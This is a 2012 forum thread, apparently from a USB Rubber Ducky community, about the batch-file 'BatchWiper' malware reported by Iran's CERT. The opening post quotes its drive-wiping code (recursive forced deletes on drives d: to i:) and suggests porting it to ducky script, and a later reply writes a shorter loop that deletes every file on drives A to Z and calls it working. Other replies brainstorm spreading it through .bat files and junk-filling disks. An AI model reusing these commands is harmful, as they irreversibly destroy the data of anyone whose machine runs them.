Darren Kitchen Posted December 18, 2012 Share Posted December 18, 2012 The Iranian CERT has posted notification on a piece of destructive malware based on simple batch files. AlienVault Labs has a writeup here: http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/ They posit that this could be spread by USB. I'm thinking it would be incredibly simple to adapt this into ducky script. Not saying you should go formatting drives, just an interesting observation. I mean it literally is dead simple, look at this code snippet: sleep for 3000IF EXIST d:\ del “d:\*.*” /q /s /fIF EXIST d:\ Chkdsk d:IF EXIST e:\ del “e:\*.*” /q /s /fIF EXIST e:\ Chkdsk e:IF EXIST f:\ del “f:\*.*” /q /s /fIF EXIST f:\ Chkdsk f:IF EXIST g:\ del “g:\*.*” /q /s /fIF EXIST g:\ Chkdsk g:IF EXIST h:\ del “h:\*.*” /q /s /fIF EXIST h:\ Chkdsk h:IF EXIST i:\ del “i:\*.*” /q /s /fIF EXIST i:\ Chkdsk i:[/CODE]What are your thoughts on this? Quote Link to comment Share on other sites More sharing options...
01000010 Posted December 18, 2012 Share Posted December 18, 2012 (edited) Its like carrying around a hammer and breaking the screen, Whats the point other than destruction. I guess the hammer would be better because it doesn't need any privileges. Edited December 18, 2012 by leapole Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 18, 2012 Share Posted December 18, 2012 Looks interesting.. Not often you see malware written in batch! I wonder what the reasoning behind it was? The selective dates make it look like a very bespoke but of work meant to target quite a specific group. As far as porting to the Ducky, it shouldn't be too hard, perhaps the quickest would be to download the batch script from pastebin and run it? Quote Link to comment Share on other sites More sharing options...
no42 Posted December 18, 2012 Share Posted December 18, 2012 Hmmm, rather destructive. From a commercial perspective - it would waste time and money. A decent forensic analysis should be able to recover data, again costing money. From a home user perspective - it would be really annoying. Specially if I had the family camera connected! Again your relying on user permissions, at home (likely an admin user) at work (likely a low level grunt). Probably, achievable through executing the commands through multiple run-box's. From an infection perspective, wouldnt it be better to write a malicious script in visual-basic or wscript to append that script (if permissions allow) to any *.bat file detected on the system (including attached drives). We already know the ducky can call a script/binary from mass storage (therefore not reliant on internet connection for payload delivery). Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted December 18, 2012 Author Share Posted December 18, 2012 And from a government attempting to slow down Iran's attempts at developing nuclear weapons perspective? Quote Link to comment Share on other sites More sharing options...
no42 Posted December 18, 2012 Share Posted December 18, 2012 If I was .gov funded, I would do something more along the lines of http://media.blackhat.com/bh-us-11/Davis/BH_US_11-Davis_USB_Slides.pdf the Ducky is a possible platform to exploit USB driver vulnerabilities. Its just hassle to find them, most of the easy exploitable bugs are now patched (in common drivers). Quote Link to comment Share on other sites More sharing options...
01000010 Posted December 18, 2012 Share Posted December 18, 2012 (edited) I would hope any nuclear research facility would be running some kind of back up or something. Now I know there are stupid people everywhere I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ). As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured. this just reminds me of telling people new to linux rm -rf / Edited December 18, 2012 by leapole Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 19, 2012 Share Posted December 19, 2012 Page 27 of the PowerPoint midnitesnake posted contains the line: The knowledge of how to emulate USB devices is not widespread Interesting quote... Quote Link to comment Share on other sites More sharing options...
reflex Posted December 19, 2012 Share Posted December 19, 2012 I would hope any nuclear research facility would be running some kind of back up or something. Now I know there are stupid people everywhere I think the best way to mess with someone would not be blank there hard drive ( throws up a giant warning flag ) but to just modify a few section of a couple files ( takes forever to figure this out ). As an example what if someone changed a few resistors on the file for the rubber ducky -- Would you check that before getting it manufactured. this just reminds me of telling people new to linux rm -rf / I would hope that any nuclear research facility wouldnt be running some kind of back up, If these weapons didnt exist the world would be a much safer place :) Quote Link to comment Share on other sites More sharing options...
PineDominator Posted December 19, 2012 Share Posted December 19, 2012 Could make a script that auto runs and very slowly populates the c drive with copies of files in every folder Call it Re.Frager Quote Link to comment Share on other sites More sharing options...
01000010 Posted December 19, 2012 Share Posted December 19, 2012 ooo can anyone say lots of little hidden files. Could take forever to index that stuff Quote Link to comment Share on other sites More sharing options...
no42 Posted December 19, 2012 Share Posted December 19, 2012 (edited) Page 27 of the PowerPoint midnitesnake posted contains the line: The knowledge of how to emulate USB devices is not widespread Interesting quote... Yeah, the guy who wrote those slides cant even emulate USB devices. Thats where that quote comes from. I'd say the Teensy was quite widespread, since it was used to pwn the PS3. *cough*. Was speaking to him at Blackhat, he's just playing off other's work, that he mentioned on slide-10. Philip Polstra (Uni of Dubuque) knows a lot more, and has written an interesting presentation & whitepaper: Preventing “Oh Shit” Moments for €20 or Less - Black Hat http://www.slideshar.../ppolstra/44con Edited December 19, 2012 by midnitesnake Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted December 19, 2012 Share Posted December 19, 2012 Kind of reminds me of the good 'ol c:\deltree .. :) Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 19, 2012 Share Posted December 19, 2012 (edited) Maybe modify that "for" loop I wrote to modify the SAM payload, to make the payload shorter. STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ ) STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del “%a:\*.*” /q /s /f) haven't tested the above yet, for apparent reasons. Edited December 19, 2012 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 19, 2012 Share Posted December 19, 2012 Ok, tested on a slightly modified command; for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ dir "%a:\*.*") The command I posted in my previous reply should work. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.